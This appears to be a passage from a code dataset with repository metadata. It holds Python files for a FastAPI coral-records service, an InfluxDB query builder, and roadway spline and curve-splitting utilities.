b_n, _ = utils_functional.quantize_shift(b_n, self.scale)
out.data = (x.data*w_n + b_n).to(out.dtype)
return out
| 2,062
| 0
| 130
|
d62a105eab4d7fcf7ae14ec1fe61bbdad0b4e98e
| 3,305
|
py
|
Python
|
corals-api.py
|
DevEliran/deep-sea-api
|
3562840f9d0fd0f4bb2edc89804f8709bb37d92d
|
[
"MIT"
] | null | null | null |
corals-api.py
|
DevEliran/deep-sea-api
|
3562840f9d0fd0f4bb2edc89804f8709bb37d92d
|
[
"MIT"
] | null | null | null |
corals-api.py
|
DevEliran/deep-sea-api
|
3562840f9d0fd0f4bb2edc89804f8709bb37d92d
|
[
"MIT"
] | null | null | null |
from fastapi import FastAPI, Path, status
from pydantic import BaseModel
from fastapi.responses import JSONResponse
from starlette.status import (
HTTP_200_OK,
HTTP_404_NOT_FOUND,
HTTP_409_CONFLICT
)
from database import CoralDatabase, get_coral_by_catalog_number_db, \
get_coral_by_category_db, add_coral_to_db, update_coral_db, delete_coral_db
from api_utils import api_reply
app = FastAPI()
db = CoralDatabase()
@app.get("/")
@app.get("/coral/{catalog_number}")
@app.get("/coral-category/{coral_category}")
@app.post("/new-coral/{catalog_number}")
@app.put("/update-coral/{catalog_number}")
@app.delete("/delete-coral/{catalog_number}")
| 32.722772
| 121
| 0.659002
|
from fastapi import FastAPI, Path, status
from pydantic import BaseModel
from fastapi.responses import JSONResponse
from starlette.status import (
HTTP_200_OK,
HTTP_404_NOT_FOUND,
HTTP_409_CONFLICT
)
from database import CoralDatabase, get_coral_by_catalog_number_db, \
get_coral_by_category_db, add_coral_to_db, update_coral_db, delete_coral_db
from api_utils import api_reply
app = FastAPI()
db = CoralDatabase()
class Coral(BaseModel):
catalog_number: int
data_provider: str
scientific_name: str
vernacular_name_category: str
taxon_rank: str
station: str
observation_date: str
latitude: str
longitude: str
depth: int
@app.get("/")
def root():
return JSONResponse({'message': "Welcome to Corals-API"},
status_code=HTTP_200_OK)
@app.get("/coral/{catalog_number}")
def get_coral_by_catalog_number(catalog_number: int = Path(None, description="Catalog Number of the coral to retrieve")):
coral = get_coral_by_catalog_number_db(catalog_number)
return api_reply(coral)
@app.get("/coral-category/{coral_category}")
def get_coral_by_category(coral_category: str = Path(None, description="Category of corals you want to retrieve")):
corals = get_coral_by_category_db(coral_category)
return api_reply(corals)
@app.post("/new-coral/{catalog_number}")
def create_coral(catalog_number: int, coral: Coral):
if get_coral_by_catalog_number_db(catalog_number):
return JSONResponse({'message': 'Catalog Number Already Exists'},
status_code=HTTP_409_CONFLICT)
add_coral_to_db(catalog_number,
coral.data_provider,
coral.scientific_name,
coral.vernacular_name_category,
coral.taxon_rank,
coral.station,
coral.observation_date,
coral.latitude,
coral.longitude,
coral.depth)
return JSONResponse({'message': 'Coral Created Successfully'},
status_code=status.HTTP_201_CREATED)
@app.put("/update-coral/{catalog_number}")
def update_coral(catalog_number: str, coral: Coral):
if not get_coral_by_catalog_number_db(catalog_number):
return JSONResponse({'message': 'Coral Not Found'},
status_code=HTTP_404_NOT_FOUND)
update_coral_db(catalog_number,
coral.data_provider,
coral.scientific_name,
coral.vernacular_name_category,
coral.taxon_rank,
coral.station,
coral.observation_date,
coral.latitude,
coral.longitude,
coral.depth)
return JSONResponse({'message': 'Coral Information Updated'},
status_code=status.HTTP_200_OK)
@app.delete("/delete-coral/{catalog_number}")
def delete_coral(catalog_number: str):
if not get_coral_by_catalog_number_db(catalog_number):
return JSONResponse({'message': 'Coral Not Found'},
status_code=HTTP_404_NOT_FOUND)
delete_coral_db(catalog_number)
return JSONResponse({'message': 'Coral Deleted Successfully'},
status_code=status.HTTP_200_OK)
| 2,259
| 223
| 155
|
35544107af096841bd233ad45b9e4391ff8f3e32
| 178
|
py
|
Python
|
{{ cookiecutter.repo_name }}/{{cookiecutter.project_slug}}/__init__.py
|
jakebrinkmann/waldo-jakebrinkmann
|
a625bff7ba9a3319968f7512d8bfa05408737dcf
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.repo_name }}/{{cookiecutter.project_slug}}/__init__.py
|
jakebrinkmann/waldo-jakebrinkmann
|
a625bff7ba9a3319968f7512d8bfa05408737dcf
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.repo_name }}/{{cookiecutter.project_slug}}/__init__.py
|
jakebrinkmann/waldo-jakebrinkmann
|
a625bff7ba9a3319968f7512d8bfa05408737dcf
|
[
"MIT"
] | null | null | null |
"""Global configuration used across all subsystems."""
import os
__version__ = os.getenv("PKG_VERSION", "0.0.0")
epilog = "‹/› with ♥ from South Dakota © 2018 Jake Brinkmann"
| 22.25
| 61
| 0.702247
|
"""Global configuration used across all subsystems."""
import os
__version__ = os.getenv("PKG_VERSION", "0.0.0")
epilog = "‹/› with ♥ from South Dakota © 2018 Jake Brinkmann"
| 0
| 0
| 0
|
7fc20f8bcaf00f7d5d6c15cebba383ee4e7d8652
| 3,583
|
py
|
Python
|
influxalchemy/query.py
|
GerasimovRM/influxalchemy
|
c6527dc99f18f58da0d2f6602759be40f24d4b44
|
[
"MIT"
] | 42
|
2016-08-16T11:36:10.000Z
|
2022-02-14T15:50:53.000Z
|
influxalchemy/query.py
|
GerasimovRM/influxalchemy
|
c6527dc99f18f58da0d2f6602759be40f24d4b44
|
[
"MIT"
] | 10
|
2017-02-01T16:16:06.000Z
|
2022-01-21T23:25:22.000Z
|
influxalchemy/query.py
|
GerasimovRM/influxalchemy
|
c6527dc99f18f58da0d2f6602759be40f24d4b44
|
[
"MIT"
] | 6
|
2016-10-26T13:10:21.000Z
|
2021-02-19T10:27:07.000Z
|
"""
InfluxDB Query Object.
"""
import functools
from influxalchemy import meta
class InfluxDBQuery:
"""
InfluxDB Query object.
entities (tuple): Query entities
client (InfluxAlchemy): InfluxAlchemy instance
expressions (tuple): Query filters
groupby (str): GROUP BY string
limit (int): LIMIT int
"""
def execute(self):
"""
Execute query.
"""
return self._client.bind.query(str(self))
def filter(self, *expressions):
"""
Filter query.
"""
expressions = self._expressions + expressions
return InfluxDBQuery(self._entities, self._client,
expressions=expressions)
def filter_by(self, **kwargs):
"""
Filter query by tag value.
"""
expressions = self._expressions
for key, val in sorted(kwargs.items()):
expressions += (meta.TagExp.equals(key, val),)
return InfluxDBQuery(self._entities, self._client,
expressions=expressions)
def group_by(self, groupby):
"""
Group query.
"""
return InfluxDBQuery(
self._entities, self._client, self._expressions, groupby)
def limit(self, limit):
"""
Limit query
"""
assert isinstance(limit, int)
return InfluxDBQuery(
self._entities, self._client, self._expressions, self._groupby,
limit)
@property
def measurement(self):
"""
Query measurement.
"""
measurements = set(x.measurement for x in self._entities)
return functools.reduce(lambda x, y: x | y, measurements)
@property
def _select(self):
"""
SELECT statement.
"""
selects = []
for ent in self._entities:
# Entity is a Tag
if isinstance(ent, meta.Tag):
selects.append(str(ent))
# Entity is a Measurement
else:
try:
for tag in self._client.tags(ent):
selects.append(tag)
for field in self._client.fields(ent):
selects.append(field)
# pylint: disable=broad-except
except Exception:
pass
return selects or ["*"]
@property
def _from(self):
"""
FROM statement.
"""
return str(self.measurement)
@property
def _where(self):
"""
WHERE statement.
"""
for exp in self._expressions:
yield "(%s)" % exp
| 27.775194
| 75
| 0.521909
|
"""
InfluxDB Query Object.
"""
import functools
from influxalchemy import meta
class InfluxDBQuery:
"""
InfluxDB Query object.
entities (tuple): Query entities
client (InfluxAlchemy): InfluxAlchemy instance
expressions (tuple): Query filters
groupby (str): GROUP BY string
limit (int): LIMIT int
"""
def __init__(self, entities, client, expressions=None, groupby=None,
limit=None):
# pylint: disable=too-many-arguments
self._entities = entities
self._client = client
self._expressions = expressions or ()
self._groupby = groupby
self._limit = limit
def __str__(self):
select = ", ".join(self._select)
from_ = self._from
where = " AND ".join(self._where)
if any(where):
iql = "SELECT %s FROM %s WHERE %s" % (select, from_, where)
else:
iql = "SELECT %s FROM %s" % (select, from_)
if self._groupby is not None:
iql += " GROUP BY %s" % self._groupby
if self._limit is not None:
iql += " LIMIT {0}".format(self._limit)
return "%s;" % iql
def __repr__(self):
return str(self)
def execute(self):
"""
Execute query.
"""
return self._client.bind.query(str(self))
def filter(self, *expressions):
"""
Filter query.
"""
expressions = self._expressions + expressions
return InfluxDBQuery(self._entities, self._client,
expressions=expressions)
def filter_by(self, **kwargs):
"""
Filter query by tag value.
"""
expressions = self._expressions
for key, val in sorted(kwargs.items()):
expressions += (meta.TagExp.equals(key, val),)
return InfluxDBQuery(self._entities, self._client,
expressions=expressions)
def group_by(self, groupby):
"""
Group query.
"""
return InfluxDBQuery(
self._entities, self._client, self._expressions, groupby)
def limit(self, limit):
"""
Limit query
"""
assert isinstance(limit, int)
return InfluxDBQuery(
self._entities, self._client, self._expressions, self._groupby,
limit)
@property
def measurement(self):
"""
Query measurement.
"""
measurements = set(x.measurement for x in self._entities)
return functools.reduce(lambda x, y: x | y, measurements)
@property
def _select(self):
"""
SELECT statement.
"""
selects = []
for ent in self._entities:
# Entity is a Tag
if isinstance(ent, meta.Tag):
selects.append(str(ent))
# Entity is a Measurement
else:
try:
for tag in self._client.tags(ent):
selects.append(tag)
for field in self._client.fields(ent):
selects.append(field)
# pylint: disable=broad-except
except Exception:
pass
return selects or ["*"]
@property
def _from(self):
"""
FROM statement.
"""
return str(self.measurement)
@property
def _where(self):
"""
WHERE statement.
"""
for exp in self._expressions:
yield "(%s)" % exp
| 790
| 0
| 80
|
e08eefad4432b67364fe41a8cc2b8d494cbdbd9c
| 17,559
|
py
|
Python
|
src/utils.py
|
kylejbrown17/PythonRoadways
|
438400c046db7ee52182de2fbea77f1b1b57de61
|
[
"MIT"
] | null | null | null |
src/utils.py
|
kylejbrown17/PythonRoadways
|
438400c046db7ee52182de2fbea77f1b1b57de61
|
[
"MIT"
] | null | null | null |
src/utils.py
|
kylejbrown17/PythonRoadways
|
438400c046db7ee52182de2fbea77f1b1b57de61
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy import interpolate
import ezdxf
import h5py
from copy import copy
from Roadways import *
def NormalVectorToLineSegment(linepts, pt):
"""
linepts = np.array([[x1,x2],[y1,y2]])
pt.shape = (2,N) # can be single pt or multiple pts
"""
if pt.ndim == 1:
pt = np.expand_dims(pt,1)
base_pt = np.expand_dims(linepts[:,0],1)
base_vec = np.expand_dims(linepts[:,1] - linepts[:,0],1)
base_vec = base_vec / np.linalg.norm(base_vec)
diff_vec = pt - base_pt
normal = diff_vec - base_vec * base_vec.T.dot(diff_vec)
return normal
def NormalDisplacementFromLineSegment(linepts, pt):
"""
returns a positive or negative distance for each query point
"""
base_pt = np.expand_dims(linepts[:,0],1)
base_vec = np.expand_dims(linepts[:,1] - linepts[:,0],1)
base_vec = base_vec / np.linalg.norm(base_vec)
diff_vec = pt - base_pt
sign = np.sign(np.cross(diff_vec.T,base_vec.T))
dist = np.sqrt(np.sum((diff_vec - base_vec * base_vec.T.dot(diff_vec))**2,axis=0))
return sign * dist
def SplitLineRecursive(linepts,i,j,THRESHOLD=5.0,ds_min=50.0):
"""
Choose best point at which to split a line to minimize total reprojection error
"""
max_err = np.max(ProjectionError(np.stack((linepts[:,i],linepts[:,j])).T, linepts[:,i:j]))
if max_err < THRESHOLD:
ds = np.cumsum(np.sqrt(np.sum(np.diff(linepts[:,i:j])**2,axis=0)))
if ds[-1] > ds_min:
k = i + np.argmin((ds - ds[-1]/2.)**2) + 1
return k
else:
return j
errors1 = np.zeros(j-(i+1))
errors2 = np.zeros(j-(i+1))
max_errors1 = np.zeros(j-(i+1))
max_errors2 = np.zeros(j-(i+1))
for k in range(i+1,j):
l1 = np.stack((linepts[:,i],linepts[:,k])).T
l2 = np.stack((linepts[:,k],linepts[:,j])).T
errors1[k-i-1] = np.sum(ProjectionError(l1, linepts[:,i+1:k])) / (k-i)
errors2[k-i-1] = np.sum(ProjectionError(l2, linepts[:,k+1:j])) / (j-k)
max_errors1[k-i-1] = np.max(ProjectionError(l1, linepts[:,i:k]))
max_errors2[k-i-1] = np.max(ProjectionError(l2, linepts[:,k:j]))
k = i+1 + np.argmin(errors1 + errors2)
# max_err1 = np.max(max_errors1)
# max_err2 = np.max(max_errors2)
return k
def FindBestLinearSplit(pts,i,j,THRESHOLD=1.0):
"""
Not working yet...
"""
max_err = np.max(ProjectionError(np.stack((pts[:,i],pts[:,j])).T, pts))
if max_err < THRESHOLD:
return j
errors1 = np.zeros(j-(i+1))
errors2 = np.zeros(j-(i+1))
max_errors1 = np.zeros(j-(i+1))
max_errors2 = np.zeros(j-(i+1))
for k in range(i+1,j):
X1 = np.stack([pts[0,i:k],np.ones(k-i)]).T
X2 = np.stack([pts[0,k:j],np.ones(j-k)]).T
X = np.block([[X1,np.zeros_like(X1)],[np.zeros_like(X2),X2]])
Y = pts[1,i:j]
params = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)
Yhat = X.dot(params)
l1 = np.stack([
[pts[0,i],Yhat[i]],
[pts[0,k],Yhat[k]]
]).T
l2 = np.stack([
[pts[0,k],Yhat[k]],
[pts[0,j-1],Yhat[j-1]]
]).T
errors1[k-i-1] = np.sum(ProjectionError(l1, pts[:,i+1:k])) / (k-i)
errors2[k-i-1] = np.sum(ProjectionError(l2, pts[:,k+1:j])) / (j-k)
max_errors1[k-i-1] = np.max(ProjectionError(l1, pts[:,i:k]))
max_errors2[k-i-1] = np.max(ProjectionError(l2, pts[:,k:j]))
k = i+1 + np.argmin(errors1 + errors2)
max_err1 = np.max(max_errors1)
max_err2 = np.max(max_errors2)
return params, k
def ComputeSplitIndices(curve,THRESHOLD=1.0,ds_min=50.0):
"""
Downsample a curve by greedy splitting until below reprojection error threshold
"""
explored = set()
frontier = set()
frontier.add((0,curve.pts.shape[1]-1))
while len(frontier) != 0:
i,j = frontier.pop()
if j - i <= 1:
explored.add((i,j))
else:
k = SplitLineRecursive(curve.pts,i,j,THRESHOLD=THRESHOLD,ds_min=ds_min)
if k != j and i != j-1:
frontier.add((i,k))
frontier.add((k,j))
else:
explored.add((i,j))
idxs = sorted(list(set([i for idxs in explored for i in idxs])))
return idxs
def UpSampleSplineCurve(curve, MAX_SEGMENT_LENGTH=5.0):
"""
Upsample
"""
unew = np.linspace(curve.u[0],curve.u[-1],100)
out = interpolate.splev(unew,curve.tck)
splineX = out[0]; splineY = out[1];
dS = np.sqrt(np.diff(splineX)**2 + np.diff(splineY)**2)
S = sum(dS)
u_dense = np.linspace(curve.u[0], curve.u[-1], int(np.round(S / MAX_SEGMENT_LENGTH)))
# compute new dense spline
out = interpolate.splev(u_dense,curve.tck)
new_pts = np.stack(out)
return SplineCurve(id=curve.id,keys=curve.keys,
pts=new_pts,tck=curve.tck,u=u_dense)
def DownsampleSplineCurve(curve,THRESHOLD=1.0,ds_min=50.0):
"""
Downsample a curve by greedy splitting until below reprojection error threshold
"""
idxs = ComputeSplitIndices(curve,THRESHOLD=THRESHOLD,ds_min=ds_min)
new_pts = np.stack([curve.pts[:,i] for i in idxs]).T
return SplineCurve(id=curve.id,keys=curve.keys,
pts=new_pts,tck=curve.tck,u=curve.u[idxs])
def SplitSplineCurve(open_map, spline_curve_id, idx, ratio):
"""
splits a spline curve and returns the new ids
"""
spline_curve = open_map.spline_curves[spline_curve_id]
split_pt = ratio*spline_curve.pts[:,idx+1] + (1.-ratio)*spline_curve.pts[:,idx] # linear interpolation
split_u = ratio*spline_curve.u[idx+1] + (1.-ratio)*spline_curve.u[idx]
new_spline_curve = SplineCurve(
id=len(open_map.spline_curves)+1,
pts=np.block([np.expand_dims(split_pt,1), spline_curve.pts[:,idx+1:]]),
keys=spline_curve.keys,
tck=spline_curve.tck.copy(),
u=np.block([split_u, spline_curve.u[idx+1:]])
)
spline_curve.u = np.block([spline_curve.u[:idx+1], split_u])
spline_curve.pts = np.block([spline_curve.pts[:,:idx+1],np.expand_dims(split_pt,1)])
# open_map.spline_curves[spline_curve_id] = spline_curve
open_map.spline_curves[new_spline_curve.id] = new_spline_curve
return spline_curve.id, new_spline_curve.id
def SplitCurve(open_map, curve_id, idx, ratio):
"""
splits a curve and returns the new ids
"""
curve = open_map.curves[curve_id]
split_pt = curve.pts[idx+1]*ratio + curve.pts[idx]*(1.-ratio)
old_pts = curve.pts[:idx+1]
old_pts.append(copy(split_pt))
new_pts = curve.pts[idx+1:]
new_pts.insert(0,copy(split_pt))
curve.pts = old_pts
new_curve = Curve(id=len(open_map.curves)+1, pts=new_pts)
open_map.curves[new_curve.id] = new_curve
# open_map.curves[curve.id] = curve
return curve.id, new_curve.id
def ProjectToPolyLine(polyline,pt,kdtree=None):
"""
projects a point to a polyline
"""
# First find the closest point on the curve
if kdtree is not None:
idx = np.argmin(np.sum((polyline.pts.T - pt)**2,axis=1))
else:
dist, idx = kdtree.query(pt)
# determine the interval in which the point lies
if idx == 0:
idx1 = idx
idx2 = idx + 1
elif idx == polyline.pts.shape[-1] - 1:
idx2 = idx
idx1 = idx - 1
else:
base_pt = polyline.pts[:,idx-1]
base_vec = polyline.pts[:,idx] - base_pt
vec = pt - base_pt
ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
if ratio > 0.0:
if ratio < 1.0:
idx1 = idx - 1
idx2 = idx
else:
idx1 = idx
idx2 = idx + 1
else:
idx1 = idx - 1
idx2 = idx
base_pt = polyline.pts[:,idx1]
base_vec = polyline.pts[:,idx2] - base_pt
vec = pt - base_pt
ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
sign = -np.sign(np.cross(vec.T,base_vec.T))
normal = sign*np.linalg.norm(vec - base_vec * ratio)
return idx1, ratio, normal
def ProjectToCurve(curve,pt,kdtree=None):
"""
projects a point to a curve (i.e. an array of curve pts)
"""
# First find the closest point on the curve
# import pdb; pdb.set_trace()
if kdtree is not None:
dist, idx = kdtree.query(np.array([pt.x, pt.y]))
else:
dists = np.array([(p.x - pt.x)**2 + (p.y - pt.y)**2 for p in curve.pts])
idx = np.argmin(dists)
dist = dists[idx]
# determine the interval in which the point lies
if idx == 0:
idx1 = idx
idx2 = idx + 1
elif idx == len(curve.pts) - 1:
idx2 = idx
idx1 = idx - 1
else:
# Choose interval based on heading of curve point
if np.dot(np.array([np.cos(curve.pts[idx].theta), np.sin(curve.pts[idx].theta)]),
CurvePtToVector(pt)[:2] - CurvePtToVector(curve.pts[idx])[:2]) < 0:
idx2 = idx
idx1 = idx - 1
else:
idx1 = idx
idx2 = idx + 1
# Compute the curve index
base_vec = CurvePtToVector(curve.pts[idx2] - curve.pts[idx1])[:2]
vec = CurvePtToVector(pt - curve.pts[idx1])[:2]
ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
sign = -np.sign(np.cross(vec.T,base_vec.T))
normal = sign*np.linalg.norm(vec - base_vec * ratio)
return idx1, ratio, normal
| 36.12963
| 122
| 0.605957
|
import numpy as np
from scipy import interpolate
import ezdxf
import h5py
from copy import copy
from Roadways import *
class SplineCurve:
def __init__(self,id=None,pts=None,keys=None,tck=None,u=None):
self.id = id
self.pts = pts
self.keys = keys
self.tck = tck # spline coefficients
self.u = u # spline eval points
class ID_Dispenser:
def __init__(self,start_id=1):
self.id = start_id
def get_id(self):
id = self.id
self.id += 1
return id
def NewRoadSection(open_map):
road_section_id = len(open_map.road_sections)+1
road_section = RoadSection(
id = road_section_id,
segment_ids = []
)
open_map.road_sections[road_section.id] = road_section
return road_section
def NewRoadSegment(open_map):
segment_id = len(open_map.road_segments)+1
road_segment = RoadSegment(
id = segment_id,
lanes = [],
boundaries = set()
)
open_map.road_segments[road_segment.id] = road_segment
return road_segment
def NewBoundary(open_map,boundary_type=None,curve_id=None):
boundary = Boundary(
id = len(open_map.boundaries)+1,
boundary_type = boundary_type,
curve = curve_id
)
open_map.boundaries[boundary.id] = boundary
return boundary
def NewLaneSegment(open_map,curve_id=None,segment_id=None):
lane_segment = LaneSegment(
id=len(open_map.lane_segments)+1,
centerline = curve_id,
segment_id = segment_id,
lane_connections = set(),
boundaries_left = set(),
boundaries_right = set()
)
open_map.lane_segments[lane_segment.id] = lane_segment
return lane_segment
def CurvePtToVector(pt):
return np.array([pt.x, pt.y, pt.theta, pt.s, pt.t, pt.k, pt.dk])
def ResamplePolyline(X,ds_min=5.0):
i = 0
while i < X.shape[1] - 1:
dx = X[:,i+1] - X[:,i]
ds = np.linalg.norm(dx)
if ds > ds_min:
pts = np.array([ds_min*j for j in range(1,int(np.floor(ds/ds_min)))])
x = np.expand_dims(X[:,i],1) + (np.expand_dims(dx,1)/ds).dot(np.expand_dims(pts,0))
X = np.block([X[:,:i+1],x,X[:,i+1:]])
i += x.shape[1] + 1
else:
i = i+1
return X
def NormalVectorToLineSegment(linepts, pt):
"""
linepts = np.array([[x1,x2],[y1,y2]])
pt.shape = (2,N) # can be single pt or multiple pts
"""
if pt.ndim == 1:
pt = np.expand_dims(pt,1)
base_pt = np.expand_dims(linepts[:,0],1)
base_vec = np.expand_dims(linepts[:,1] - linepts[:,0],1)
base_vec = base_vec / np.linalg.norm(base_vec)
diff_vec = pt - base_pt
normal = diff_vec - base_vec * base_vec.T.dot(diff_vec)
return normal
def ProjectionError(linepts, pt):
normal = NormalVectorToLineSegment(linepts, pt)
error = np.sqrt(np.sum(normal**2,axis=0))
return error
def NormalDisplacementFromLineSegment(linepts, pt):
"""
returns a positive or negative distance for each query point
"""
base_pt = np.expand_dims(linepts[:,0],1)
base_vec = np.expand_dims(linepts[:,1] - linepts[:,0],1)
base_vec = base_vec / np.linalg.norm(base_vec)
diff_vec = pt - base_pt
sign = np.sign(np.cross(diff_vec.T,base_vec.T))
dist = np.sqrt(np.sum((diff_vec - base_vec * base_vec.T.dot(diff_vec))**2,axis=0))
return sign * dist
def SplitLineRecursive(linepts,i,j,THRESHOLD=5.0,ds_min=50.0):
"""
Choose best point at which to split a line to minimize total reprojection error
"""
max_err = np.max(ProjectionError(np.stack((linepts[:,i],linepts[:,j])).T, linepts[:,i:j]))
if max_err < THRESHOLD:
ds = np.cumsum(np.sqrt(np.sum(np.diff(linepts[:,i:j])**2,axis=0)))
if ds[-1] > ds_min:
k = i + np.argmin((ds - ds[-1]/2.)**2) + 1
return k
else:
return j
errors1 = np.zeros(j-(i+1))
errors2 = np.zeros(j-(i+1))
max_errors1 = np.zeros(j-(i+1))
max_errors2 = np.zeros(j-(i+1))
for k in range(i+1,j):
l1 = np.stack((linepts[:,i],linepts[:,k])).T
l2 = np.stack((linepts[:,k],linepts[:,j])).T
errors1[k-i-1] = np.sum(ProjectionError(l1, linepts[:,i+1:k])) / (k-i)
errors2[k-i-1] = np.sum(ProjectionError(l2, linepts[:,k+1:j])) / (j-k)
max_errors1[k-i-1] = np.max(ProjectionError(l1, linepts[:,i:k]))
max_errors2[k-i-1] = np.max(ProjectionError(l2, linepts[:,k:j]))
k = i+1 + np.argmin(errors1 + errors2)
# max_err1 = np.max(max_errors1)
# max_err2 = np.max(max_errors2)
return k
def FindBestLinearSplit(pts,i,j,THRESHOLD=1.0):
"""
Not working yet...
"""
max_err = np.max(ProjectionError(np.stack((pts[:,i],pts[:,j])).T, pts))
if max_err < THRESHOLD:
return j
errors1 = np.zeros(j-(i+1))
errors2 = np.zeros(j-(i+1))
max_errors1 = np.zeros(j-(i+1))
max_errors2 = np.zeros(j-(i+1))
for k in range(i+1,j):
X1 = np.stack([pts[0,i:k],np.ones(k-i)]).T
X2 = np.stack([pts[0,k:j],np.ones(j-k)]).T
X = np.block([[X1,np.zeros_like(X1)],[np.zeros_like(X2),X2]])
Y = pts[1,i:j]
params = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)
Yhat = X.dot(params)
l1 = np.stack([
[pts[0,i],Yhat[i]],
[pts[0,k],Yhat[k]]
]).T
l2 = np.stack([
[pts[0,k],Yhat[k]],
[pts[0,j-1],Yhat[j-1]]
]).T
errors1[k-i-1] = np.sum(ProjectionError(l1, pts[:,i+1:k])) / (k-i)
errors2[k-i-1] = np.sum(ProjectionError(l2, pts[:,k+1:j])) / (j-k)
max_errors1[k-i-1] = np.max(ProjectionError(l1, pts[:,i:k]))
max_errors2[k-i-1] = np.max(ProjectionError(l2, pts[:,k:j]))
k = i+1 + np.argmin(errors1 + errors2)
max_err1 = np.max(max_errors1)
max_err2 = np.max(max_errors2)
return params, k
def ComputeSplitIndices(curve,THRESHOLD=1.0,ds_min=50.0):
"""
Downsample a curve by greedy splitting until below reprojection error threshold
"""
explored = set()
frontier = set()
frontier.add((0,curve.pts.shape[1]-1))
while len(frontier) != 0:
i,j = frontier.pop()
if j - i <= 1:
explored.add((i,j))
else:
k = SplitLineRecursive(curve.pts,i,j,THRESHOLD=THRESHOLD,ds_min=ds_min)
if k != j and i != j-1:
frontier.add((i,k))
frontier.add((k,j))
else:
explored.add((i,j))
idxs = sorted(list(set([i for idxs in explored for i in idxs])))
return idxs
def UpSampleSplineCurve(curve, MAX_SEGMENT_LENGTH=5.0):
"""
Upsample
"""
unew = np.linspace(curve.u[0],curve.u[-1],100)
out = interpolate.splev(unew,curve.tck)
splineX = out[0]; splineY = out[1];
dS = np.sqrt(np.diff(splineX)**2 + np.diff(splineY)**2)
S = sum(dS)
u_dense = np.linspace(curve.u[0], curve.u[-1], int(np.round(S / MAX_SEGMENT_LENGTH)))
# compute new dense spline
out = interpolate.splev(u_dense,curve.tck)
new_pts = np.stack(out)
return SplineCurve(id=curve.id,keys=curve.keys,
pts=new_pts,tck=curve.tck,u=u_dense)
def DownsampleSplineCurve(curve,THRESHOLD=1.0,ds_min=50.0):
"""
Downsample a curve by greedy splitting until below reprojection error threshold
"""
idxs = ComputeSplitIndices(curve,THRESHOLD=THRESHOLD,ds_min=ds_min)
new_pts = np.stack([curve.pts[:,i] for i in idxs]).T
return SplineCurve(id=curve.id,keys=curve.keys,
pts=new_pts,tck=curve.tck,u=curve.u[idxs])
def CurveFromSplineCurve(spline_curve):
curve = Curve()
curve.id = spline_curve.id
curve.pts = []
# Compute CurvePt values (theta, S, K, dK)
out = interpolate.splev(spline_curve.u,spline_curve.tck)
X = out[0]; Y = out[1]
deltaX = np.diff(X); deltaY = np.diff(Y)
dS = np.sqrt(deltaX**2 + deltaY**2)
S = np.zeros(len(dS)+1)
S[1:] = np.cumsum(dS)
# Get heading from first derivative
d_out = interpolate.splev(spline_curve.u,spline_curve.tck,der=1)
dX = d_out[0]; dY = d_out[1];
theta = np.arctan2(dY,dX)
theta_emp = np.arctan2(deltaY,deltaX)
# Get curvature from second derivatives
dd_out = interpolate.splev(spline_curve.u,spline_curve.tck,der=2)
ddX = dd_out[0]; ddY = dd_out[1];
K = (dX*ddY - dY*ddX)/((dX*dX + dY*dY)**1.5) # curvature
# Get Derivative of Curvature - WAY TOO NOISY TO BE USEFUL
ddd_out = interpolate.splev(spline_curve.u,spline_curve.tck,der=3)
dddX = dd_out[0]; dddY = dd_out[1];
# DK = ((dX**2 + dY**2)*(dX*dddY - dY*dddX) - (dX*ddY - dY*ddX)*2*(dX*ddX+dY*ddY)) / (ddX**2+ddY*2)**2
dK = np.diff(K) / dS # derivative of curvature
dK = (dK[1:] + dK[:-1]) / 2.0
dK = np.concatenate([[0.],dK,[0.]])
for i in range(len(X)):
curve.pts.append(
CurvePt(
id = 0,
x=X[i],
y=Y[i],
theta = theta[i],
s = S[i],
t = 0.0,
k = K[i],
dk = dK[i]
)
)
return curve
def GetSplitIndex(spline_curve, divider, BUFFER_DISTANCE=5.0):
split_idx = None
ratio = None
direction = None
# Check that the curve is in fact separated by the divider line
normal_to_div = NormalDisplacementFromLineSegment(divider.pts, spline_curve.pts)
idxs = (np.diff(np.sign(normal_to_div)) != 0).nonzero()[0]
if len(idxs) == 0:
idx = None
direction = -np.sign(normal_to_div[0])
ratio = None
for idx in idxs:
if normal_to_div[idx] < normal_to_div[idx+1]:
direction = 1
else:
direction = -1
if np.max(normal_to_div) > BUFFER_DISTANCE and np.min(normal_to_div) < -BUFFER_DISTANCE:
s1 = np.cross(divider.pts[:,0] - spline_curve.pts[:,idx], spline_curve.pts[:,idx+1] - spline_curve.pts[:,idx])
s2 = np.cross(divider.pts[:,1] - spline_curve.pts[:,idx], spline_curve.pts[:,idx+1] - spline_curve.pts[:,idx])
if np.sign(s1) != np.sign(s2):
# compute split point
split_idx = idx
d1 = ProjectionError(divider.pts, spline_curve.pts[:,idx])
d2 = ProjectionError(divider.pts, spline_curve.pts[:,idx+1])
ratio = np.sum(d1 / (d2 + d1))
break
else:
split_idx = None
ratio = None
return split_idx, ratio, direction
def SplitSplineCurve(open_map, spline_curve_id, idx, ratio):
"""
splits a spline curve and returns the new ids
"""
spline_curve = open_map.spline_curves[spline_curve_id]
split_pt = ratio*spline_curve.pts[:,idx+1] + (1.-ratio)*spline_curve.pts[:,idx] # linear interpolation
split_u = ratio*spline_curve.u[idx+1] + (1.-ratio)*spline_curve.u[idx]
new_spline_curve = SplineCurve(
id=len(open_map.spline_curves)+1,
pts=np.block([np.expand_dims(split_pt,1), spline_curve.pts[:,idx+1:]]),
keys=spline_curve.keys,
tck=spline_curve.tck.copy(),
u=np.block([split_u, spline_curve.u[idx+1:]])
)
spline_curve.u = np.block([spline_curve.u[:idx+1], split_u])
spline_curve.pts = np.block([spline_curve.pts[:,:idx+1],np.expand_dims(split_pt,1)])
# open_map.spline_curves[spline_curve_id] = spline_curve
open_map.spline_curves[new_spline_curve.id] = new_spline_curve
return spline_curve.id, new_spline_curve.id
def SplitCurve(open_map, curve_id, idx, ratio):
"""
splits a curve and returns the new ids
"""
curve = open_map.curves[curve_id]
split_pt = curve.pts[idx+1]*ratio + curve.pts[idx]*(1.-ratio)
old_pts = curve.pts[:idx+1]
old_pts.append(copy(split_pt))
new_pts = curve.pts[idx+1:]
new_pts.insert(0,copy(split_pt))
curve.pts = old_pts
